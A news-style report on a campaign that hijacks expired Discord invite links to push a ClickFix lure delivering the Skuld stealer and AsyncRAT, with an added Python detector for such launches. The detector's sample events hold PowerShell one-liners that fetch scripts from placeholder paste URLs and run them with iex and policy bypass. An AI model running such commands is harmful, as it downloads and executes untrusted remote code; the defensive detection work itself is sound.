New Malware Campaign Exploits Discord Invite Links
A recent wave of cyberattacks has emerged, taking advantage of a weakness in Discord’s invitation system. The campaign delivers the Skuld information stealer and the AsyncRAT remote access trojan, which together can harvest sensitive information and give attackers control of users’ systems.
The Attack Mechanism
According to cybersecurity firm Check Point, attackers have found a way to hijack expired or deleted Discord invite links. By registering vanity links, they can covertly redirect users from trusted sources to malicious servers. This multi-layered attack incorporates the ClickFix phishing tactic along with time-based evasion techniques, making it difficult for users to detect the threat.
Understanding Discord’s Invite System
Discord’s invite mechanism allows users to create temporary, permanent, or custom invite links. Custom vanity invite codes can, in principle, be registered again by another server. Expired or deleted links are not supposed to be claimable by others, yet Check Point’s analysis reveals that certain invite codes can be reused, which lets attackers reclaim them for nefarious purposes and redirect unsuspecting users towards malicious servers.
The Phishing Campaign
The current investigation follows a previous phishing campaign, where attackers similarly exploited expired vanity invite links to manipulate users into joining fraudulent Discord servers. Once on these servers, victims were prompted to verify their identities, inadvertently leading them to phishing sites designed to drain their digital assets.
The User Experience
When users click on a previously trusted invite link, they may find themselves on a fake Discord server that mirrors a legitimate one. To gain full access to these malicious servers, users are required to authorize a bot that guides them through a verification process. This step deceptively encourages them to click a "Verify" button, which initiates an unauthorized JavaScript action.
The Technical Breakdown
Clicking the "Verify" button triggers a series of actions that appear harmless. Users are instructed to open the Windows Run dialog and paste a PowerShell command that has already been placed on their clipboard. This seemingly innocuous step downloads a PowerShell script from a site such as Pastebin, which in turn retrieves a first-stage downloader. Eventually, this chain executes AsyncRAT and Skuld Stealer on the victim’s machine.
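The ClickFix step above leaves a recognisable trace on the endpoint: powershell.exe spawned by explorer.exe (the Run dialog) with a command line that pulls content from a paste site and pipes it into an execution primitive. The following detection sketch is an added example, not code from the article or from Check Point; the process-creation events and their field names are constructed and hypothetical, and the paste URLs are placeholders.

```python
"""Flag Run-dialog PowerShell launches that fetch and execute a remote script."""
import re

# Constructed process-creation events with a hypothetical schema.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr https://pastebin.com/raw/EXAMPLE | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"parent": r"C:\Program Files\VSCode\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -File build.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c \"Invoke-Expression (New-Object Net.WebClient)"
                ".DownloadString('https://pastebin.com/raw/EXAMPLE2')\""},
]

# Hosting services the article names as staging points for the campaign.
PASTE_HOSTS = re.compile(
    r"https?://(?:www\.)?(?:pastebin\.com|raw\.githubusercontent\.com|bitbucket\.org)/", re.I)
# Download-and-execute primitives commonly seen in pasted one-liners.
DOWNLOAD_EXEC = re.compile(
    r"\b(?:iwr|invoke-webrequest|downloadstring|invoke-expression|iex)\b", re.I)
# Hidden window or execution-policy bypass switches.
STEALTH_FLAGS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|e(?:xecutionpolicy)?p?\s+bypass)", re.I)


def score_event(ev):
    """Return the list of reasons an event resembles ClickFix; empty if benign."""
    reasons = []
    if not ev["image"].lower().endswith("powershell.exe"):
        return reasons
    cmd = ev["cmdline"]
    if ev["parent"].lower().endswith("explorer.exe"):
        reasons.append("powershell launched from explorer.exe (Run dialog / interactive paste)")
    if PASTE_HOSTS.search(cmd):
        reasons.append("fetches content from a paste or code-hosting site")
    if DOWNLOAD_EXEC.search(cmd):
        reasons.append("download-and-execute primitive in command line")
    if STEALTH_FLAGS.search(cmd):
        reasons.append("hidden window or execution-policy bypass")
    return reasons


def find_clickfix(events, min_reasons=3):
    """Return (index, reasons) for events that meet the alert threshold."""
    return [(i, score_event(e)) for i, e in enumerate(events)
            if len(score_event(e)) >= min_reasons]
```

Tuning the threshold and the host list to the environment matters: developer workstations legitimately run PowerShell from IDEs, which is why the parent process and the paste-site fetch are weighted together rather than alerting on either alone.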
AsyncRAT and Skuld Stealer
AsyncRAT is designed for comprehensive remote control of infected systems. A unique feature of this malware involves using a "dead drop resolver" to connect to a command-and-control server via a Pastebin file. In conjunction, Skuld Stealer operates as a Golang-based information thief, targeting sensitive data from various sources, including Discord, web browsers, and digital wallets.
Users of cryptocurrency wallets should be particularly vigilant. Skuld has been observed extracting seed phrases and passwords from wallets such as Exodus and Atomic, using techniques that hijack legitimate application functionality.
Evasion and Exfiltration Techniques
This malware operation capitalizes on trusted cloud platforms such as GitHub, Bitbucket, and Pastebin, effectively camouflaging its activity among regular data traffic. Researchers have noted that this strategy allows the malware to remain undetected for longer periods.
After successful extraction, the collected data is transferred back to the attackers via Discord webhooks, further complicating detection efforts. Additionally, Check Point has identified multiple campaigns from the same group, distributing similar malicious payloads under various guises, including game-hacking tools.
Geographic Impact
The campaigns have predominantly targeted users in the United States, Vietnam, France, Germany, Slovakia, Austria, the Netherlands, and the United Kingdom. This broad reach underscores the global impact of this malware.
Conclusion
As cybercriminals find new and innovative ways to exploit social media platforms like Discord, it’s imperative for users to remain cautious. The ease with which trusted links can be hijacked and the strategic deployment of sophisticated malware serve as a stark reminder of the risks inherent in digital communication. Staying informed and vigilant is key to protecting oneself from these emerging threats.